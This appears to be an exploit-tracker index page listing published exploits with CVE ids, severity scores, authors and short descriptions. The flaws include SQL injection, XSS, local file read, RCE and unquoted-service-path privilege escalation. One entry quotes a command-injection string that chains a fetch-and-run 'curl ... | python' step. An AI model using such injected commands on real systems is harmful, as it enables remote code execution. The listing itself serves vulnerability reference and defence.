Text Exploits

31,433 exploits tracked across all sources.

Sort: Activity Stars
EIP-2026-114171 EXPLOITDB text
WordPress Plugin video-synchro-pdf 1.7.4 - Local File Inclusion
by Hassan Khan Yusufzai
CVE-2021-24405 EXPLOITDB MEDIUM text
easy_cookies_policy < 1.6.2 - Authenticated Stored Cross-Site Scripting via Settings Update
The Easy Cookies Policy WordPress plugin through 1.6.2 is lacking any capability and CSRF check when saving its settings, allowing any authenticated users (such as subscriber) to change them. If users can't register, this can be done through CSRF. Furthermore, the cookie banner setting is not sanitised or validated before being output in all pages of the frontend and the backend settings one, leading to a Stored Cross-Site Scripting issue.
by 0xB9
CVSS 6.5
CVE-2021-43701 EXPLOITDB MEDIUM text
CSZ CMS 1.2.9 - SQL Injection via fieldS[] and orderby Parameters
CSZ CMS 1.2.9 has a Time and Boolean-based Blind SQL Injection vulnerability in the endpoint /admin/export/getcsv/article_db, via the fieldS[] and orderby parameters.
by Rahad Chowdhury
CVSS 6.5
CVE-2022-50956 EXPLOITDB MEDIUM text
WordPress Plugin amministrazione-aperta 3.7.3 Local File Read
WordPress Plugin amministrazione-aperta 3.7.3 contains a local file read vulnerability that allows unauthenticated attackers to read arbitrary files by exploiting insufficient input validation in the open parameter. Attackers can supply file paths through the open GET parameter in dispatcher.php to include and read sensitive files accessible to the web server.
by Hassan Khan Yusufzai
CVSS 6.2
CVE-2022-50917 EXPLOITDB HIGH text
ProtonVPN 1.26.0 - Unquoted Service Path Privilege Escalation via WireGuard Configuration
ProtonVPN 1.26.0 contains an unquoted service path vulnerability in its WireGuard service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path by placing malicious executables in specific file system locations to gain elevated privileges during service startup.
by gemreda
CVSS 7.8
CVE-2022-27432 EXPLOITDB HIGH text
Pluck CMS 4.7.15 - Cross-Site Request Forgery
A Cross-Site Request Forgery (CSRF) in Pluck CMS v4.7.15 allows attackers to change the password of any given user by exploiting this feature leading to account takeover.
by Devansh Bordia
CVSS 8.8
EIP-2026-117987 EXPLOITDB text
Sysax FTP Automation 6.9.0 - Privilege Escalation
by bzyo
CVE-2021-44529 EXPLOITDB CRITICAL text
Ivanti Endpoint Manager Cloud Services Appliance < 4.5 - Unauthenticated Remote Code Execution
A code injection vulnerability in the Ivanti EPM Cloud Services Appliance (CSA) allows an unauthenticated user to execute arbitrary code with limited permissions (nobody).
by d7x
CVSS 9.8
EIP-2026-101316 EXPLOITDB text
ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS)
by LiquidWorm
EIP-2026-101315 EXPLOITDB text
ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure
by LiquidWorm
EIP-2026-113841 EXPLOITDB text
Wordpress Plugin iQ Block Country 1.2.13 - Arbitrary File Deletion via Zip Slip (Authenticated)
by Ceylan BOZOĞULLARINDAN
CVE-2022-50918 EXPLOITDB HIGH text
VIVE Runtime Service 1.0.0.4 - Code Injection
VIVE Runtime Service 1.0.0.4 contains an unquoted service path vulnerability that allows local users to execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted binary path by placing malicious executables in specific system directories to gain LocalSystem access during service startup.
by Faisal Alasmari
CVSS 8.4
EIP-2026-104183 EXPLOITDB text
Baixar GLPI Project 9.4.6 - SQLi
by Prof. Joas Antonio
CVE-2022-50919 EXPLOITDB CRITICAL text
Tdarr 2.00.15 - Unauthenticated Remote Code Execution via Help Terminal Command Injection
Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like `--help; curl .py | python` to execute remote code without authentication.
by Sam Smith
CVSS 9.8
CVE-2022-50921 EXPLOITDB HIGH text
WOW21 5.0.1.9 - Unquoted Service Path Privilege Escalation
WOW21 5.0.1.9 contains an unquoted service path vulnerability that allows local attackers to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted binary path to inject malicious executables that will be launched with LocalSystem permissions during service startup.
by Antonio Cuomo
CVSS 7.8
CVE-2022-50920 EXPLOITDB HIGH text
Sandboxie-Plus 5.50.2 - Code Injection
Sandboxie-Plus 5.50.2 contains an unquoted service path vulnerability in the SbieSvc Windows service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted binary path to inject malicious executables that will be run with LocalSystem privileges during service startup.
by Antonio Cuomo
CVSS 8.4
CVE-2022-27095 EXPLOITDB HIGH text
BattlEye v0.9 - Privilege Escalation
BattlEye v0.9 contains an unquoted service path which allows attackers to escalate privileges to the system level.
by Saud Alenazi
CVSS 7.8
CVE-2022-27094 EXPLOITDB MEDIUM text
Sony PlayMemories Home v6.0 - Privilege Escalation
Sony PlayMemories Home v6.0 contains an unquoted service path which allows attackers to escalate privileges to the system level.
by Saud Alenazi
CVSS 6.7
EIP-2026-117445 EXPLOITDB text
McAfee(R) Safe Connect VPN - Unquoted Service Path Elevation Of Privilege
by Saud Alenazi
CVE-2022-50923 EXPLOITDB HIGH text
Cobian Backup 0.9 - Privilege Escalation
Cobian Backup 0.9 contains an unquoted service path vulnerability that allows local users to execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted binary path in the CobianReflectorService to inject malicious code that will execute with LocalSystem permissions during service startup.
by Hejap Zairy Al-Sharif
CVSS 7.8
CVE-2022-50900 EXPLOITDB HIGH text
Wondershare Dr.Fone 12.0.18 - Code Injection
Wondershare Dr.Fone 12.0.18 contains an unquoted service path vulnerability that allows local users to execute arbitrary code with elevated system privileges. Attackers can exploit the misconfigured service path to insert malicious code that will be executed with LocalSystem permissions during service startup.
by Mohamed Alzhrani
CVSS 8.4
CVE-2022-50971 EXPLOITDB HIGH text
Malwarebytes 4.5 Unquoted Service Path Privilege Escalation
Malwarebytes 4.5 contains an unquoted service path vulnerability in the MBAMService executable that allows local attackers to escalate privileges by injecting malicious code into the system root path. Attackers can place executable files in unquoted path directories that execute with LocalSystem privileges during service startup or system reboot.
by Hejap Zairy Al-Sharif
CVSS 7.8
CVE-2022-50924 EXPLOITDB HIGH text
Private Internet Access <3.3 - Code Injection
Private Internet Access 3.3 contains an unquoted service path vulnerability that allows local users to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted path in the service configuration to inject malicious code that would execute with LocalSystem permissions during service startup.
by Saud Alenazi
CVSS 8.4
EIP-2026-117179 EXPLOITDB text
Foxit PDF Reader 11.0 - Unquoted Service Path
by Hejap Zairy Al-Sharif
EIP-2026-116965 EXPLOITDB text
Cloudflare WARP 1.4 - Unquoted Service Path
by Hejap Zairy Al-Sharif
By Source
All 31,433 Writeup 62,183 Exploitdb 50,126 Nomisec 22,380 Github 3,588 Metasploit 3,311 Vulncheck_xdb 927 Inthewild 514 Gitlab 479 Gitee 415 Patchapalooza 312
By Language
text 31,433 python 6,554 ruby 6,001 c 3,625 perl 2,849 html 2,074 php 1,333 bash 462 java 370 c++ 260 javascript 229 shell 131 go 73 postscript 25 typescript 25